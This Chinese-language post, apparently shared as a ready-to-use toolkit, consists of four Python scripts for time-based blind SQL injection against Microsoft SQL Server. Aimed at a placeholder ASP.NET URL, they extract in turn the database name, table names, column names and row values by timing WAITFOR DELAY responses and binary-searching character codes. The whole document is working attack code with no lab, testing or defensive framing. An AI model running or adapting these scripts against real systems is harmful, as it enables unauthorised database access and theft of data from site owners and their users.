一、爆破当前数据库名
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
databases = []
length = []
for l in range(1,50):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select db_name())))>{0} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
print(‘ length is ‘ + str(l))
break
else:
pass
print(length)
databasename = ‘‘
for i in range(1,length[0]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1.aspx?classify=1‘;if(ascii(substring((select db_name()),{0},1)))>{1} waitfor delay ‘0:0:1‘ --"
urlformat = url.format(i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
databasename+=chr(mid)
print(databasename)
databases.append(databasename)
print(databases)
二、爆破表名
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []
for i in range(0,1000):
tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
tablenumFormat = tablenum.format(i)
start_time0 = time.time()
rsp1 = requests.get(tablenumFormat,headers=headers)
num.append(i)
num2.append(i)
if time.time() - start_time0 < 2:
break
else:
pass
#print(num)
num.pop()
for n in num:
for l in range(1,50):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables))))>{1} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(n,l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
#print(‘ length is ‘ + str(l))
break
else:
pass
#print(length)
for n in num:
tablename = ‘‘
le = num.index(n)
for i in range(1,length[le]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..sysobjects where xtype=‘U‘ and name not in (select top {0} name from sys.tables)),{1},1)))>{2} waitfor delay ‘0:0:1‘ --"
urlformat = url.format(n,i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
tablename+=chr(mid)
#print(tablename)
tables.append(tablename)
for j in range(0,len(num)):
print("第%d表名:%s"%(num[j],tables[j]))
三、爆破字段名
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []
for i in range(0,1000):
tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
tablenumFormat = tablenum.format(i)
start_time0 = time.time()
rsp1 = requests.get(tablenumFormat,headers=headers)
num.append(i)
num2.append(i)
if time.time() - start_time0 < 2:
break
else:
pass
print(num)
num.pop()
for n in num:
for l in range(1,50):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘)))))>{1} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(n,l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
print(‘ length is ‘ + str(l))
break
else:
pass
print(length)
for n in num:
tablename = ‘‘
le = num.index(n)
for i in range(1,length[le]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 name from DB..syscolumns Where id=Object_Id(‘表名‘) and name not in (select top {0} name from DB..syscolumns Where id=Object_Id(‘表名‘))),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
urlformat = url.format(n,i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
tablename+=chr(mid)
print(tablename)
tables.append(tablename)
for j in range(0,len(num)):
print("第%d列名:%s"%(num[j],tables[j]))
四、爆破字段值
#coding:utf-8
import requests
import time
import string
import sys
headers = {"user-agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)"}
#chars = ‘0123456789.@_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz‘
tables = []
length = []
num = []
num2 = []
for i in range(0,1000):
tablenum = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名)),1,1)))>0 waitfor delay ‘0:0:1‘ -- "
tablenumFormat = tablenum.format(i)
start_time0 = time.time()
rsp1 = requests.get(tablenumFormat,headers=headers)
num.append(i)
num2.append(i)
if time.time() - start_time0 < 2:
break
else:
pass
print(num)
num.pop()
for n in num:
for l in range(1,20):
lengthUrl = "http://www.xxxx.com/id.aspx?classify=1‘;if(len((select top 1 字段名 from DB..表名 where Account not in (select top {0} 字段名 from DB..表名))))>{1} waitfor delay ‘0:0:1‘ -- "
lengthUrlFormat = lengthUrl.format(n,l)
start_time0 = time.time()
rsp0 = requests.get(lengthUrlFormat,headers=headers)
if time.time() - start_time0 < 2:
length.append(l)
print(‘ length is ‘ + str(l))
break
else:
pass
print(length)
for n in num:
tablename = ‘‘
le = num.index(n)
for i in range(1,length[le]+1):
min_value = 48
max_value = 122
mid = (min_value + max_value) // 2
while(min_value < max_value):
url = "http://www.xxxx.com/id.aspx?classify=1‘;if(ascii(substring((select top 1 字段名 from DB..表名 Where Account not in (select top {0} 字段名 from DB..表名)),{1},1)))>{2} waitfor delay ‘0:0:1‘ -- "
urlformat = url.format(n,i,mid)
start_time = time.time()
rsp = requests.get(urlformat,headers=headers)
if time.time() - start_time > 2:
min_value = mid + 1
else:
max_value = mid
pass
mid = (min_value+max_value)//2
tablename+=chr(mid)
print(tablename)
tables.append(tablename)
for j in range(0,len(num)):
print("第%d值:%s"%(num[j],tables[j]))
SQL server 时间盲注脚本